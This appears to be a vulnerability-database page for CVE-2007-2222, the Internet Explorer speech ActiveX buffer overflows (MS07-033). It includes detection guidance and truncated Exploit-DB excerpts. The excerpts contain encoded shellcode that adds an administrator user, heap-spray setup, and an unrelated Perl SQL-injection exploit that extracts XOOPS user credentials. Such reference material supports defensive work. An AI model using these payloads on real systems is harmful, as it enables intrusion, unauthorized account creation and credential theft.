CVE-2007-2222
published 2007-06-12CVE-2007-2222: Multiple buffer overflows in the (1) ActiveListen (Xlisten.dll) and (2) ActiveVoice (Xvoice.dll) speech controls, as used by Microsoft Internet Explorer 5.01…
PriorityP351critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
57.52%
99.0th percentile
Multiple buffer overflows in the (1) ActiveListen (Xlisten.dll) and (2) ActiveVoice (Xvoice.dll) speech controls, as used by Microsoft Internet Explorer 5.01, 6, and 7, allow remote attackers to execute arbitrary code via a crafted ActiveX object that triggers memory corruption, as demonstrated via the ModeName parameter to the FindEngine function in ACTIVEVOICEPROJECTLib.DirectSS.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70
bytes↗
%6E%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%06%90%90%90%90%90%90%90%fc%e4%22%eb%5e%31%ad%c3%c0%f7%e8%ff%ff%af%1a%30%5f%bb%5a%bd%ee%a5%ae%d4%19%e3%9b%3a%05%b9%42%03%a7%41%4c%11%a9%7c%ee%7f%77%8c%f3%90%e8%b4%ef%4c%d4%8c%d4%99%e4%5d%08%1e%9a%82%17%b3%21%43%31%44%5a%1b%6d%f5%69%39%d9%c4%38%50%43%af%44%cc%df%76%7a%57%a5%c2%85%7e%b7%f3%18%d3%39%70%9f%16%94%aa%37%5f%c5%ea%0a%70%23%10%c0%83%47%37%eb%97%6a%b3%6c%3c%6c
- →Exploit triggers via the ModeName parameter to ACTIVEVOICEPROJECTLib.DirectSS.FindEngine — monitor ActiveX instantiation of this ProgID and oversized ModeName arguments ↗
- →XP SP2 exploit uses a 888-byte 'A' padding buffer before EBP/EIP overwrite in ModeName; Win2000 SP4 exploit uses 950-byte 'A' padding — detect abnormally large ModeName strings passed to FindEngine ↗
- →Win2000 SP4 exploit uses SEH overwrite with return address 0x007d0023 (call edi) located in XVoice.dll — monitor for SEH chain corruption in processes hosting this ActiveX ↗
- →Exploit uses ModeID filled with ~199544 NOP bytes followed by shellcode — detect heap spray of large NOP sleds in browser processes loading Xvoice.dll or Xlisten.dll ↗
- →Multiple large string buffers (9,999,999 chars each) are allocated for heap spray — detect allocation of multiple near-10MB string objects in scripting engine context ↗
- →Target DLL for Win2000 SP4 is C:\WINNT\speech\XVoice.dll — alert on loading of this module into iexplore.exe or other browser processes ↗
- ·Two separate exploit payloads exist: one targeting Windows XP SP2 (exploit 4066) and one targeting Windows 2000 SP4 (exploit 4065) — shellcode, NOP sled construction, and return addresses differ between the two; detection signatures must account for both variants ↗
- ·The Win2000 SP4 exploit uses a UNICODE-aware NOP sled technique (add byte ptr esi, ch as NOP; xchg eax, edi) rather than standard 0x90 NOPs — byte-pattern signatures based solely on 0x90 NOP sleds will miss this variant ↗
- ·The XP SP2 exploit EIP value (%01%0a) is described as 'jmp to scode, UNICODE expanded' — the actual jump target is UNICODE-expanded at runtime, so static EIP value matching may not be reliable across all environments ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033)
exploitdb·2007-06-13
CVE-2007-2222 Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033)
Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033)
---
REM metasploit, add a user 'su' with pass 'tzu'
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%
Exploit-DB
Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033)
exploitdb·2007-06-13
CVE-2007-2222 Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033)
Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033)
---
targetFile = "C:\WINNT\speech\XVoice.dll"
memberName = "FindEngine"
progid = "ACTIVEVOICEPROJECTLib.DirectSS"
argCount = 28
REM metasploit one, JmpCallAddtive, add a user 'su' with pass 'p'
scode_fragment = unescape("%6E%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%06%90%90%90%90%90%90%90%fc%e4%22%eb%5e%31%ad%c3%c0%f7%e8%ff%ff%af%1a%30%5f%bb%5a%bd%ee%a5%ae%d4%19%e3%9b%3a%05%b9%42%03%a7%41%4c%11%a9%7c%ee%7f%77%8c%f3%90%e8%b4%ef%4c%d4%8c%d4%99%e4%5d%08%1e%9a%82%17%b3%21%43%31%44%5a%1b%6d%f5%69%39%d9%c4%38%50%43%af%44%cc%df%76%7a%57%a5%c2%85%7e%b7%f3%18%d3%39%70%9f%16%94%aa%37%5f%c5%ea%0a%70%23%10%c0%83%47%37%eb%97%6a%b3%6c%3c%6c")
nop1 = unescape("%01%6E%40%6E%40
Exploit-DB
XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
exploitdb·2007-04-02
CVE-2007-1974 XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
---
#!/usr/bin/perl
#[Script Name: XOOPS Module WF-Section : ";
$dir = ;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
print "User ID (uid): ";
$id = ;
chop ($id);
$target = "9999999%20union%20select%201111,2222,3333,4444,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$sock
No writeups or analysis indexed.
http://osvdb.org/35353http://retrogod.altervista.org/win_speech_2k_sp4.htmlhttp://retrogod.altervista.org/win_speech_xp_sp2.htmlhttp://secunia.com/advisories/25627http://securitytracker.com/id?1018235http://www.exploit-db.com/exploits/4065http://www.kb.cert.org/vuls/id/507433http://www.securityfocus.com/archive/1/471947/100/0/threadedhttp://www.securityfocus.com/bid/24426http://www.us-cert.gov/cas/techalerts/TA07-163A.htmlhttp://www.vupen.com/english/advisories/2007/2153https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-033https://exchange.xforce.ibmcloud.com/vulnerabilities/34630https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2031http://osvdb.org/35353http://retrogod.altervista.org/win_speech_2k_sp4.htmlhttp://retrogod.altervista.org/win_speech_xp_sp2.htmlhttp://secunia.com/advisories/25627http://securitytracker.com/id?1018235http://www.exploit-db.com/exploits/4065http://www.kb.cert.org/vuls/id/507433http://www.securityfocus.com/archive/1/471947/100/0/threadedhttp://www.securityfocus.com/bid/24426http://www.us-cert.gov/cas/techalerts/TA07-163A.htmlhttp://www.vupen.com/english/advisories/2007/2153https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-033https://exchange.xforce.ibmcloud.com/vulnerabilities/34630https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2031
2007-06-12
Published